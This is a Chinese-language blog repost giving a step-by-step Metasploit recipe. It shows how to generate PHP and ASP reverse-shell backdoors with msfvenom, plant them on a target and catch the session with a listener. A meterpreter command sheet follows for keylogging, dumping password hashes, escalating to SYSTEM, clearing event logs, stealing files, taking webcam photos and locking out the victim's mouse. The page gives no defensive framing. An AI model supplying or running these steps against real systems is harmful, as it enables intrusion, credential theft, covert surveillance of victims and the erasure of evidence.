msf建立php反弹shell
<p>一 建立反弹后门</p><p>msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php</p>
<p> </p>
<p> </p>
<p>注:生成的反弹木马存放在当前用户home目录下;</p>
<p>将生成的木马上传到目标机中,可以远程访问;</p>
<p>windows下asp反弹木马:</p>
<p>root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>二 监听端口建立会话</p>
<p>1 使用handler模块</p>
<p>msf > use exploit/multi/handler</p>
<p>2 设置payload</p>
<p>msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)</p>
<p>PAYLOAD =>php/meterpreter/reverse_tcp</p>
<p>3 设置监听主机</p>
<p>msfexploit(multi/handler) > set LHOST 192.168.88.155</p>
<p>LHOST =>192.168.88.155</p>
<p>4 设置监听端口(默认4444)</p>
<p>msfexploit(multi/handler) > set LPORT 4444</p>
<p>LPORT => 4444</p>
<p>5 发动攻击</p>
<p>msfexploit(multi/handler) > exploit</p>
<p> </p>
<p>注:要远程访问你上传的后门文件</p>
<p> </p>
<p>meterpreter > keyscan_start</p>
<p>keyscan_dump // 查看键盘记录</p>
<p>监控目标系统键盘输入,停止监控为keyscan_stop</p>
<p> </p>
<p>meterpreter > migrate</p>
<p>将你的Meterpreter移到另一个进程</p>
<p>先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)</p>
<p> </p>
<p>meterpreter > getuid</p>
<p>获取用户的服务器运行</p>
<p>meterpreter > shell</p>
<p>进入目标电脑,命令提示符</p>
<p>meterpreter > Idletime</p>
<p>目标电脑闲置了多长时间</p>
<p>meterpreter > Hashdump</p>
<p>导出对方SAM数据库里的内容,推荐一个hash破解网站:</p>
<p>http://www.objectif-securite.ch/products.php</p>
<p>meterpreter > getsystem</p>
<p>利用已自漏洞,自动提权为SYSTEM</p>
<p> </p>
<p>meterpreter > clearev</p>
<p>清除事件日志</p>
<p> </p>
<p> meterpreter > execute(某Windows指令)</p>
<p>在对方电脑上运行该指令</p>
<p>meterpreter > execute <br>Usage: execute -f file <br> </p>
<p>meterpreter > download(文件路径)</p>
<p>下载文件命令</p>
<p>例如下载C盘下面的jzking121.txt文件</p>
<p>meterpreter > download c:\\jzking121.txt</p>
<p>[*] downloading: c:\jzking121.txt -> jzking121.txt</p>
<p>[*] downloaded : c:\jzking121.txt -> jzking121.txt</p>
<p>注意,文件路径中要有两个\\</p>
<p>Upload指令跟Download指令类似!</p>
<p> </p>
<p> meterpreter > shutdown </p>
<p>关闭目标计算机,reboot为重启计算机</p>
<p> </p>
<p>meterpreter >screenshot</p>
<p>获取目标电脑,屏幕截图</p>
<p> </p>
<p> meterpreter > uictl enable keyboard 启用目标使用键盘</p>
<p>meterpreter > uictl disable mouse 禁止目标使用鼠标</p>
<p>enable 为启用</p>
<p>disable 禁用</p>
<p> </p>
<p> meterpreter > webcam_list</p>
<p>目标系统的摄像头列表</p>
<p> </p>
<p> meterpreter > webcam_snap</p>
<p>从指定的摄像头,拍摄照片</p>
<p> </p>
<p> meterpreter > search -d c:\\ -f 1.jpg</p>
<p>搜索目标电脑,C盘1.jpg文件<br>————————————————<br><br>转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258</p><br><br>
来源:https://www.cnblogs.com/ly584521/p/12330746.html
頁:
[1]